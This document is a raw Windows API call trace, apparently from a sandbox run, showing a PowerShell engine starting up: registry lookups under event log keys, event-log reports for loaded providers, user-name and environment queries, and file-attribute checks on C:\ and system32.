	[0786.736] RegOpenKeyExW (in: hKey=0x398, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x39c) returned 0x0
	[0786.737] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x0) returned 0x2
	[0786.737] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x3a0) returned 0x0
	[0786.737] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x0) returned 0x2
	[0786.737] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x3a4) returned 0x0
	[0786.737] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x0) returned 0x2
	[0786.737] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x3a8) returned 0x0
	[0786.738] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x0) returned 0x2
	[0786.738] RegOpenKeyExW (in: hKey=0x398, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x3ac) returned 0x0
	[0786.738] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x0) returned 0x2
	[0786.738] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x3b0) returned 0x0
	[0786.738] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x0) returned 0x2
	[0786.738] RegOpenKeyExW (in: hKey=0x398, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x3b4) returned 0x0
	[0786.738] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x0) returned 0x2
	[0786.739] RegOpenKeyExW (in: hKey=0x398, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x3b8) returned 0x0
	[0786.739] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd658 | out: phkResult=0x1cd658*=0x3bc) returned 0x0
	[0786.739] RegCloseKey (hKey=0x3bc) returned 0x0
	[0786.739] RegCloseKey (hKey=0x398) returned 0x0
	[0786.740] RegCloseKey (hKey=0x3b8) returned 0x0
	[0787.796] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b4b0008
	[0789.085] ReportEventW (hEventLog=0x1b4b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eb0338*="WSMan", lpRawData=0x2eb00a8) returned 1
	[0789.091] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0789.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.091] CoTaskMemFree (pv=0x3c3ff0) 
	[0789.092] CoTaskMemAlloc (cb=0x804) returned 0x28a7b60
	[0789.092] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28a7b60, nSize=0x1cd8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd8e8) returned 0x1
	[0789.092] CoTaskMemFree (pv=0x28a7b60) 
	[0789.092] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0789.092] GetUserNameW (in: lpBuffer=0x371d50, pcbBuffer=0x1cd928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd928) returned 1
	[0789.093] CoTaskMemFree (pv=0x371d50) 
	[0789.093] ReportEventW (hEventLog=0x1b4b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eb5870*="Alias", lpRawData=0x2eb5600) returned 1
	[0789.099] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0789.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.099] CoTaskMemFree (pv=0x3c3ff0) 
	[0789.100] CoTaskMemAlloc (cb=0x804) returned 0x28a7b60
	[0789.100] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28a7b60, nSize=0x1cd8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd8e8) returned 0x1
	[0789.100] CoTaskMemFree (pv=0x28a7b60) 
	[0789.100] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0789.100] GetUserNameW (in: lpBuffer=0x371d50, pcbBuffer=0x1cd928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd928) returned 1
	[0789.101] CoTaskMemFree (pv=0x371d50) 
	[0789.101] ReportEventW (hEventLog=0x1b4b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ebae68*="Environment", lpRawData=0x2ebabf8) returned 1
	[0789.107] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0789.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.107] CoTaskMemFree (pv=0x3c3ff0) 
	[0789.108] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0789.108] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0789.108] CoTaskMemFree (pv=0x3c3ff0) 
	[0789.108] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0789.108] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0789.108] CoTaskMemFree (pv=0x3c3ff0) 
	[0789.109] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1cd490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0789.109] SetErrorMode (uMode=0x1) returned 0x1
	[0789.109] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1cd6a0 | out: lpFileInformation=0x1cd6a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0789.109] SetErrorMode (uMode=0x1) returned 0x1
	[0789.109] GetLogicalDrives () returned 0x4
	[0789.110] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.110] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0789.110] SetErrorMode (uMode=0x1) returned 0x1
	[0789.111] CoTaskMemAlloc (cb=0x68) returned 0x288ebc0
	[0789.111] CoTaskMemAlloc (cb=0x68) returned 0x288ec30
	[0789.111] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x288ebc0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1cd670, lpMaximumComponentLength=0x1cd66c, lpFileSystemFlags=0x1cd668, lpFileSystemNameBuffer=0x288ec30, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cd670*=0x9c354b42, lpMaximumComponentLength=0x1cd66c*=0xff, lpFileSystemFlags=0x1cd668*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0789.111] CoTaskMemFree (pv=0x288ebc0) 
	[0789.111] CoTaskMemFree (pv=0x288ec30) 
	[0789.111] SetErrorMode (uMode=0x1) returned 0x1
	[0789.111] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0789.112] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.112] SetErrorMode (uMode=0x1) returned 0x1
	[0789.112] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd610 | out: lpFileInformation=0x1cd610*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0789.112] SetErrorMode (uMode=0x1) returned 0x1
	[0789.112] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.112] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.113] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0789.113] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.113] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0789.136] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.136] SetErrorMode (uMode=0x1) returned 0x1
	[0789.136] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd440 | out: lpFileInformation=0x1cd440*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0789.136] SetErrorMode (uMode=0x1) returned 0x1
	[0789.137] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.137] SetErrorMode (uMode=0x1) returned 0x1
	[0789.137] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd440 | out: lpFileInformation=0x1cd440*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0789.137] SetErrorMode (uMode=0x1) returned 0x1
	[0789.137] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd280, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0789.137] SetErrorMode (uMode=0x1) returned 0x1
	[0789.137] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd4e0 | out: lpFileInformation=0x1cd4e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0789.138] SetErrorMode (uMode=0x1) returned 0x1
	[0789.138] CoTaskMemAlloc (cb=0x804) returned 0x28a7b60
	[0789.138] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28a7b60, nSize=0x1cd8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd8e8) returned 0x1
	[0789.138] CoTaskMemFree (pv=0x28a7b60) 
	[0789.138] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0789.138] GetUserNameW (in: lpBuffer=0x371d50, pcbBuffer=0x1cd928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd928) returned 1
	[0789.139] CoTaskMemFree (pv=0x371d50) 
	[0789.139] ReportEventW (hEventLog=0x1b4b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ec1f58*="FileSystem", lpRawData=0x2ec1ce8) returned 1
	[0789.158] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0789.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.158] CoTaskMemFree (pv=0x3c3ff0) 
	[0789.158] CoTaskMemAlloc (cb=0x804) returned 0x28a7b60
	[0789.158] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28a7b60, nSize=0x1cd8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd8e8) returned 0x1
	[0789.159] CoTaskMemFree (pv=0x28a7b60) 
	[0789.159] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0789.159] GetUserNameW (in: lpBuffer=0x371d50, pcbBuffer=0x1cd928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd928) returned 1
	[0789.159] CoTaskMemFree (pv=0x371d50) 
	[0789.159] ReportEventW (hEventLog=0x1b4b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ec7798*="Function", lpRawData=0x2ec7528) returned 1
	[0789.163] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0789.163] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.163] CoTaskMemFree (pv=0x3c3ff0) 
	[0789.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0789.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0789.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0789.186] CoTaskMemAlloc (cb=0x804) returned 0x28a7b60
	[0789.186] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28a7b60, nSize=0x1cd8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd8e8) returned 0x1
	[0790.039] CoTaskMemFree (pv=0x28a7b60) 
	[0790.039] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0790.039] GetUserNameW (in: lpBuffer=0x371d50, pcbBuffer=0x1cd928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd928) returned 1
	[0790.039] CoTaskMemFree (pv=0x371d50) 
	[0790.040] ReportEventW (hEventLog=0x1b4b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ee9fc0*="Registry", lpRawData=0x2ee9d50) returned 1
	[0790.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0790.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0790.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0790.271] CoTaskMemAlloc (cb=0x804) returned 0x28a7b60
	[0790.271] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28a7b60, nSize=0x1cd8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd8e8) returned 0x1
	[0790.271] CoTaskMemFree (pv=0x28a7b60) 
	[0790.271] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0790.271] GetUserNameW (in: lpBuffer=0x371d50, pcbBuffer=0x1cd928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd928) returned 1
	[0790.272] CoTaskMemFree (pv=0x371d50) 
	[0790.272] ReportEventW (hEventLog=0x1b4b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eef3d8*="Variable", lpRawData=0x2eef168) returned 1
	[0790.316] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0790.316] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.316] CoTaskMemFree (pv=0x3c3ff0) 
	[0790.319] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0790.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.319] CoTaskMemFree (pv=0x3c3ff0) 
	[0790.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0790.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0790.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0790.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0791.223] CoTaskMemAlloc (cb=0x804) returned 0x28a7b60
	[0791.223] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x28a7b60, nSize=0x1cd8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd8e8) returned 0x1
	[0791.223] CoTaskMemFree (pv=0x28a7b60) 
	[0791.223] CoTaskMemAlloc (cb=0x204) returned 0x371d50
	[0791.223] GetUserNameW (in: lpBuffer=0x371d50, pcbBuffer=0x1cd928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd928) returned 1
	[0791.224] CoTaskMemFree (pv=0x371d50) 
	[0791.224] ReportEventW (hEventLog=0x1b4b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f03230*="Certificate", lpRawData=0x2f02fc0) returned 1
	[0792.037] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0792.037] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.038] CoTaskMemFree (pv=0x3c3ff0) 
	[0792.039] CoTaskMemAlloc (cb=0x20e) returned 0x3684a0
	[0792.039] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3684a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0792.039] CoTaskMemFree (pv=0x3684a0) 
	[0792.040] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0792.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.041] CoTaskMemFree (pv=0x3c3ff0) 
	[0792.041] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0792.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.041] CoTaskMemFree (pv=0x3c3ff0) 
	[0792.056] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0792.056] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.056] CoTaskMemFree (pv=0x3c3ff0) 
	[0792.058] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0792.058] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.058] CoTaskMemFree (pv=0x3c3ff0) 
	[0792.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0792.059] SetErrorMode (uMode=0x1) returned 0x1
	[0792.060] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd530 | out: lpFileInformation=0x1cd530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.473] SetErrorMode (uMode=0x1) returned 0x1
	[0793.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.473] SetErrorMode (uMode=0x1) returned 0x1
	[0793.474] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd530 | out: lpFileInformation=0x1cd530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0793.474] SetErrorMode (uMode=0x1) returned 0x1
	[0793.475] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0793.475] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0793.475] CoTaskMemFree (pv=0x3c3ff0) 
	[0793.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0793.485] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0793.485] SetErrorMode (uMode=0x1) returned 0x1
	[0793.485] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd4f0 | out: lpFileInformation=0x1cd4f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0793.485] SetErrorMode (uMode=0x1) returned 0x1
	[0793.485] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
